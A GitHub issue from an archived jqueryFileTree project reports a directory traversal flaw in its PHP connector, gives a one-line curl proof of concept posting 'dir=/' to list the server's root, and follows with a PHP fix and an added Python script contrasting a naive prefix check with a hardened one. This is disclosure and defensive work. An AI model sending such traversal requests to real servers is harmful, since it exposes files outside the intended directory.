This repository has been archived by the owner on Feb 10, 2021. It is now read-only.

Security issue in connectors #66

Open
ambulong opened this issue May 9, 2017 · 1 comment

Comments


ambulong commented May 9, 2017

The connectors may cause a directory traversal attack in the default settings.

POC:
curl 'http://localhost:8000/js/jqueryfiletree-2.1.5/dist/connectors/jqueryFileTree.php' -H 'Referer: xxx' -d "dir=/"

@ambulong ambulong changed the title Security in connectors Security issue in connectors May 9, 2017

betavr commented Aug 15, 2017

Thanks for the heads up. Here is a quick fix:

```php
// Assumes $root is the canonical base directory and already ends with "/";
// realpath() also returns false for a path that does not exist, so such a
// request becomes "/" here and fails the prefix test below.
$postDir = realpath(rawurldecode($root.(isset($_POST['dir']) ? $_POST['dir'] : null ))) . "/";
if (strpos($postDir, $root) !== 0) exit("ERROR: Root filesystem directory cannot be traversed");
```
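The realpath-plus-prefix check in the quick fix is the right idea, but two details decide whether it holds: the root it compares against must itself be canonical and end with a separator (otherwise a sibling directory whose name merely starts with the root's name passes the prefix test), and a request that does not resolve to a real directory must be rejected outright rather than compared as a string. The following Python script is an added example, not code from this issue or from the jqueryFileTree project; it puts a plain prefix test beside a hardened version and runs both over a constructed directory tree containing such a sibling and a symlink pointing out of the root. Function names, the directory layout and the sample requests are all made up for the demo.

```python
import os
import tempfile


def naive_is_inside(root, requested):
    """Plain prefix test: realpath(root + requested) must start with
    realpath(root), with no separator appended to the root and no check
    that the result exists. Kept only to show where it is weaker than
    resolve_within_root()."""
    resolved = os.path.realpath(os.path.join(root, requested.lstrip("/")))
    return resolved.startswith(os.path.realpath(root))


def resolve_within_root(root, requested):
    """Return the canonical directory for `requested` (the connector's POST
    `dir` value) under `root`, or None if it does not stay inside `root`.

    Hardening over the naive test: the root is canonicalised and given a
    trailing separator, so "<root>-private" is not accepted as a prefix
    match for "<root>"; a request that does not resolve to an existing
    directory is rejected instead of being compared as a string."""
    canonical_root = os.path.realpath(root)
    if not os.path.isdir(canonical_root):
        return None
    root_prefix = canonical_root.rstrip(os.sep) + os.sep
    # Strip leading separators: os.path.join() would otherwise discard the
    # root entirely when `requested` is absolute.
    candidate = os.path.join(canonical_root, requested.lstrip("/\\"))
    resolved = os.path.realpath(candidate)  # collapses ".." and follows symlinks
    if not os.path.isdir(resolved):
        return None
    if resolved != canonical_root and not resolved.startswith(root_prefix):
        return None
    return resolved


def build_demo_tree():
    """Construct a throwaway tree (constructed sample data, not from the page):

        <tmp>/files/docs/                       the directory the connector should serve
        <tmp>/files-private/                    a sibling whose name starts with "files"
        <tmp>/files/escape -> <tmp>/files-private   a symlink leading out of the root
    """
    base = tempfile.mkdtemp(prefix="jqft-demo-")
    files = os.path.join(base, "files")
    os.makedirs(os.path.join(files, "docs"))
    os.makedirs(os.path.join(base, "files-private"))
    try:
        os.symlink(os.path.join(base, "files-private"), os.path.join(files, "escape"))
    except (OSError, NotImplementedError):
        pass  # symlinks unavailable (e.g. unprivileged Windows); the other cases still run
    return base, files


def run_demo():
    """Evaluate a set of requests against both checks. Returns the tree's base
    directory, the served root, and a dict mapping each request to the pair
    (naive_result, hardened_result) so the difference is visible."""
    base, files = build_demo_tree()
    requests = ["/", "/docs/", "/../files-private/", "/escape/",
                "/../../../../etc/", "/missing/"]
    results = {req: (naive_is_inside(files, req), resolve_within_root(files, req))
               for req in requests}
    return base, files, results


if __name__ == "__main__":
    _, _, results = run_demo()
    for req, (naive, hardened) in results.items():
        print("%-22s naive=%-5s hardened=%s" % (req, naive, hardened))
```

Running it shows the two checks agreeing on `/` and `/docs/` and disagreeing on the rest: the naive test accepts the sibling directory and the symlink target, and accepts a path that does not exist, while the hardened resolver returns None for each. The same three conditions (canonical root, trailing separator, existence check) carry over directly to the PHP connector.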
